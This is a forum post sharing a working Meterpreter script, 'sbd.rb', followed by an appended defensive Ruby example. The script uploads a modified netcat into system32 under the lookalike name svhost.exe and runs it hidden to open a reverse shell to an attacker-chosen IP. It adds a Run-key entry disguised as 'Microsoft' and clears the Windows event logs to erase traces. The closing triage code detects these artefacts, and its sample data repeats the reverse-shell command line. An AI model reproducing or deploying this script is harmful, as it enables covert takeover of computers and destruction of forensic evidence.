Gonzalez

sbd.rb


sbd.rb uploads sbd.exe, which runs as svchost.exe with the settings that are entered by the attacker.

It autoruns via the registry and autostarts as the script is run, then clears the system logs. Remember, it is a modded netcat for a reverse shell. It needs some more edits to the script to hide the reg a little better, but this will do till update time.

session = client
host,port = session.tunnel_peer.split(':')
#Menu-Options
@@exec_opts = Rex::Parser::Arguments.new(
"-r" => [ true, "Respawn time limit." ],
"-p" => [ true, "Port Number to open." ],
"-k" => [ true, "Authentication name."],
"-h" => [ true, "Local ip address."]
)
def usage
print_line("Sbd Configuration Meterpreter Script by Intern0t.net")
print_line(" Michael Johnson (Zero Cold) mjog123@hotmail.com ")
print_line("####################################################")
print(@@exec_opts.usage)
raise Rex::Script::Completed
end

#Files to upload to target host
ncexe = File.join(Msf::Config.install_root, "data", "sbd.exe")
#Function to upload files
def upload(session,file)
location = session.fs.file.expand_path("%SystemRoot%\\system32")
fileontrgt = "#{location}\\#{"svhost"}.exe"
print_status("Uploading #{file}....")
session.fs.file.upload_file("#{fileontrgt}","#{file}")
print_status("#{file} Uploaded!")
return fileontrgt
end

#Function to execute sbd
def sbdrun(session,time,auth,port,ip)
location = session.fs.file.expand_path("%SystemRoot%\\system32")
session.sys.process.execute("cmd /c #{location}\\svhost.exe -q -r #{time} -k #{auth} -e cmd.exe -D on -p #{port} #{ip}", nil, {'Hidden' => true, 'Channelized' => false})
print_status("Local Ip Sbd Will Connect Back On: #{ip}")
print_status("Local Port Sbd Will Connect Back On: #{port}")
print_status("Pass Phrase: #{auth}")
print_status("Respawn Time: #{time}")
end
#Function to add registry for sbd
def regadd(session,time,auth,port,ip)
location = session.fs.file.expand_path("%SystemRoot%\\system32")
print_status("Adding to Registry ...")
session.sys.process.execute("cmd /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /f /v Microsoft /d \"#{location}\\svhost.exe\ -q -r #{time} -k #{auth} -e cmd -D on -p #{port} #{ip}\"", nil, {'Hidden' => true, 'Channelized' => false})
print_status("Successfully added to Registry ...")
end
def clrevtlgs(session)
evtlogs = [
'security',
'system',
'application',
'directory service',
'dns server',
'file replication service'
]

begin
evtlogs.each do |evl|
log = session.sys.eventlog.open(evl)
log.clear
end
rescue ::Exception => e
print_status("Error clearing Event Log: #{e.class} #{e}")

end
end

#Menu-Input
time = nil
port = nil
ip = nil
auth = nil
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-r"
time = val
when "-p"
port = val
when "-h"
ip = val
when "-k"
auth = val
end

}
if port

upload(session,ncexe)
sbdrun(session,time,auth,port,ip)
regadd(session,time,auth,port,ip)
clrevtlgs(session)
else
usage
end

Video:

http://www.youtube.com/watch?v=imFAm3AxOuc
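
Seen from the defender's side, the script in this post leaves three artefacts on a host: a process image named svhost.exe under system32, a Run value pointing at that file, and cleared event logs. The Ruby below is an added example, not part of the original post, that triages telemetry for that combination; the event hash layout, host names and all sample values are assumptions constructed for illustration.

```ruby
LEGIT       = 'svchost.exe'
RUN_KEY     = /\\CurrentVersion\\Run(\\|\z)/i
LOG_CLEARED = { 'Security' => 1102, 'System' => 104 } # Windows "log cleared" event IDs

# Levenshtein distance, to catch near-miss names such as svhost.exe.
def edit_distance(a, b)
  prev = (0..b.size).to_a
  a.each_char.with_index(1) do |ca, i|
    cur = [i]
    b.each_char.with_index(1) do |cb, j|
      cur << [prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca == cb ? 0 : 1)].min
    end
    prev = cur
  end
  prev.last
end

# Distance 1 only: distance 2 would also match the legitimate sihost.exe.
def lookalike?(text)
  name = text.to_s[/([^\\\s"]+\.exe)/i, 1].to_s.downcase # first *.exe name in a path or command line
  !name.empty? && name != LEGIT && edit_distance(name, LEGIT) <= 1
end

# Rule name (symbol) that a single event triggers, or nil.
def rule_hit(e)
  case e[:type]
  when :process  then :masquerade  if lookalike?(e[:image])
  when :registry then :run_key     if RUN_KEY.match?(e[:key].to_s) && lookalike?(e[:data])
  when :eventlog then :log_cleared if LOG_CLEARED.fetch(e[:channel], -1) == e[:id]
  end
end

# Per host: rules that fired; all three together match the sequence in the post.
def triage(events)
  events.group_by { |e| e[:host] }.transform_values do |evs|
    hits = evs.map { |e| rule_hit(e) }.compact.uniq
    { hits: hits, severity: hits.size == 3 ? :high : (hits.empty? ? :none : :review) }
  end
end

SAMPLE = [ # constructed events, not captured telemetry
  { host: 'WS01', type: :process,  image: 'C:\WINDOWS\system32\svhost.exe' },
  { host: 'WS01', type: :registry, key: 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft',
    data: 'C:\WINDOWS\system32\svhost.exe -q -r 10 -k example -e cmd -D on -p 4444 192.0.2.10' },
  { host: 'WS01', type: :eventlog, channel: 'Security', id: 1102 },
  { host: 'WS01', type: :eventlog, channel: 'System',   id: 104 },
  { host: 'WS02', type: :process,  image: 'C:\Windows\System32\sihost.exe' },
  { host: 'WS02', type: :eventlog, channel: 'System',   id: 7036 },
]
```

`triage(SAMPLE)` rates WS01 as `:high` and WS02 as `:none`. Because the log-clear events are themselves written to the cleared log, forwarding events off the host is what keeps the third rule usable.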
